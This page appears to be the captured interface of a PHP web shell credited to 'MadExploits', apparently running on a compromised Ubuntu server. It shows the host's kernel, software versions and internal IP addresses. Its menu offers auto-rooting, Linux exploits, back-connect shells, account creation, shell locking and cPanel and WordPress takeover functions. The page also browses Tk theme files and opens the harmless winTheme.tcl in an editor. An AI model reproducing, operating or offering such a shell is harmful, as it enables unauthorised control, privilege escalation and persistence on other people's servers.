Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
miniconda3 /
python /
lib /
tk8.6 /
ttk /
[ HOME SHELL ]
Name
Size
Permission
Action
altTheme.tcl
3.52
KB
-rw-rw-r--
aquaTheme.tcl
3.63
KB
-rw-rw-r--
button.tcl
2.86
KB
-rw-rw-r--
clamTheme.tcl
4.55
KB
-rw-rw-r--
classicTheme.tcl
3.66
KB
-rw-rw-r--
combobox.tcl
11.98
KB
-rw-rw-r--
cursors.tcl
4.36
KB
-rw-rw-r--
defaults.tcl
4.31
KB
-rw-rw-r--
entry.tcl
16.96
KB
-rw-rw-r--
fonts.tcl
5.36
KB
-rw-rw-r--
menubutton.tcl
6.03
KB
-rw-rw-r--
notebook.tcl
5.53
KB
-rw-rw-r--
panedwindow.tcl
2.13
KB
-rw-rw-r--
progress.tcl
1.06
KB
-rw-rw-r--
scale.tcl
2.63
KB
-rw-rw-r--
scrollbar.tcl
3.08
KB
-rw-rw-r--
sizegrip.tcl
2.34
KB
-rw-rw-r--
spinbox.tcl
4.7
KB
-rw-rw-r--
treeview.tcl
9.57
KB
-rw-rw-r--
ttk.tcl
4.7
KB
-rw-rw-r--
utils.tcl
8.09
KB
-rw-rw-r--
vistaTheme.tcl
9.26
KB
-rw-rw-r--
winTheme.tcl
2.72
KB
-rw-rw-r--
xpTheme.tcl
1.99
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : winTheme.tcl
# # Settings for 'winnative' theme. # namespace eval ttk::theme::winnative { ttk::style theme settings winnative { ttk::style configure "." \ -background SystemButtonFace \ -foreground SystemWindowText \ -selectforeground SystemHighlightText \ -selectbackground SystemHighlight \ -fieldbackground SystemWindow \ -insertcolor SystemWindowText \ -troughcolor SystemScrollbar \ -font TkDefaultFont \ ; ttk::style map "." -foreground [list disabled SystemGrayText] ; ttk::style map "." -embossed [list disabled 1] ; ttk::style configure TButton \ -anchor center -width -11 -relief raised -shiftrelief 1 ttk::style configure TCheckbutton -padding "2 4" ttk::style configure TRadiobutton -padding "2 4" ttk::style configure TMenubutton \ -padding "8 4" -arrowsize 3 -relief raised ttk::style map TButton -relief {{!disabled pressed} sunken} ttk::style configure TEntry \ -padding 2 -selectborderwidth 0 -insertwidth 1 ttk::style map TEntry \ -fieldbackground \ [list readonly SystemButtonFace disabled SystemButtonFace] \ -selectbackground [list !focus SystemWindow] \ -selectforeground [list !focus SystemWindowText] \ ; ttk::style configure TCombobox -padding 2 ttk::style map TCombobox \ -selectbackground [list !focus SystemWindow] \ -selectforeground [list !focus SystemWindowText] \ -fieldbackground [list \ readonly SystemButtonFace \ disabled SystemButtonFace] \ -foreground [list \ disabled SystemGrayText \ {readonly focus} SystemHighlightText \ ] \ -focusfill [list {readonly focus} SystemHighlight] \ ; ttk::style element create ComboboxPopdownFrame.border from default ttk::style configure ComboboxPopdownFrame \ -borderwidth 1 -relief solid ttk::style configure TSpinbox -padding {2 0 16 0} ttk::style configure TLabelframe -borderwidth 2 -relief groove ttk::style configure Toolbutton -relief flat -padding {8 4} ttk::style map Toolbutton -relief \ {disabled flat selected sunken pressed sunken active raised} ttk::style configure TScale -groovewidth 4 ttk::style configure TNotebook -tabmargins {2 2 2 0} ttk::style configure TNotebook.Tab -padding {3 1} -borderwidth 1 ttk::style map TNotebook.Tab -expand [list selected {2 2 2 0}] # Treeview: ttk::style configure Heading -font TkHeadingFont -relief raised ttk::style configure Treeview -background SystemWindow ttk::style map Treeview \ -background [list disabled SystemButtonFace \ selected SystemHighlight] \ -foreground [list disabled SystemGrayText \ selected SystemHighlightText] ttk::style configure TProgressbar \ -background SystemHighlight -borderwidth 0 ; } }
Close